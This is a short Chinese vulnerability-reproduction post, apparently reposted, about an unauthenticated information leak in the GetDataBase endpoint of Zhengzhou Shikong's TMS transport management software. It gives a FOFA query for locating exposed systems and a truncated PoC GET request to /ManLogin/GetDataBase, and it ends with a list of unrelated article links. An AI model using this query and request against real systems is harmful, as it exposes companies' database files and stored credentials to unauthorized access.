当前位置: 首页 > news >正文

郑州时空-TMS运输管理系统 GetDataBase 信息泄露漏洞复现

news 2025/8/6 16:52:57

0x01 产品简介

郑州时空-TMS运输管理系统是一款专为物流运输企业设计的综合性管理软件,旨在提高运输效率、降低运输成本,并实现供应链的协同运作。系统基于现代计算机技术和物流管理方法,结合了郑州时空公司的专业经验和技术优势,为物流运输企业提供了一套高效、智能的运输管理解决方案。该系统支持多网点、多机构、多功能作业,能够全面满足企业的运输管理需求。适用于各类物流运输企业,包括运输公司、各企业下面的运输队等,特别适用于需要高效管理运输过程、降低运输成本并提升供应链效率的企业。

0x02 漏洞概述

郑州时空-TMS运输管理系统 GetDataBase 接口存在信息泄露漏洞,未经身份验证攻击者可通过该漏洞读取系统内部数据库文件,泄露账号密码等重要凭证,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="/Images/ManLogin/name.png"

0x04 漏洞复现

PoC

GET /ManLogin/GetDataBase HTTP/1.1
Host: 
User-
http://www.lryc.cn/news/512990.html

相关文章:

  • 如何使用React,透传各类组件能力/属性?
  • 汇编点灯练习
  • 数据结构与算法之动态规划: LeetCode 213. 打家劫舍 II (Ts版)
  • Git工具
  • SpringBoot3.3.3+shardingsphere-jdbc5.5.0读写分离、自定义生成主键策略
  • 开发运维基本功:无需复杂配置快速实现本地Nginx的公网远程访问
  • 金融租赁系统助力企业转型与市场竞争力提升
  • 【漫话机器学习系列】028.CP
  • 软件测试——面试八股文(入门篇)
  • 如何在不同工作场景下优化嵌入式系统的电源消耗
  • java - SpringBoot3.x接入Security6.x实现JWT认证
  • 【每日学点鸿蒙知识】无障碍、getLastLocation、蓝牙问题、卡片大小、关系型数据库等
  • [Linux] 服务器CPU信息
  • MySQL——数据类型
  • 《AI赋能自由职业:开启竞争力提升新征程》
  • Excel转Json编辑器工具
  • 创建型设计模式、结构型设计模式与行为型设计模式 上下文任务通用方案 设计模式 大全
  • Mac 环境 VVenC 编译与编码命令行工具使用教程
  • 如何在 Ubuntu 22.04 上部署 Nginx 并优化以应对高流量网站教程
  • springcloud各个组件介绍
  • HTML5实现好看的喜庆圣诞节网站源码
  • 《学习之道》
  • 【Unity3D】ECS入门学习(十一)ComponentSystem、JobComponentSystem
  • 力扣刷题:栈和队列OJ篇(上)
  • XGPT用户帮助手册
  • Oracle 数据库 dmp文件从高版本导入低版本的问题处理
  • ShardingSphere-Proxy分表场景测试案例
  • 学技术学英文:Tomcat的线程模型调优
  • 创建flutter项目遇到无法连接源的问题
  • MAC系统QT图标踩坑记录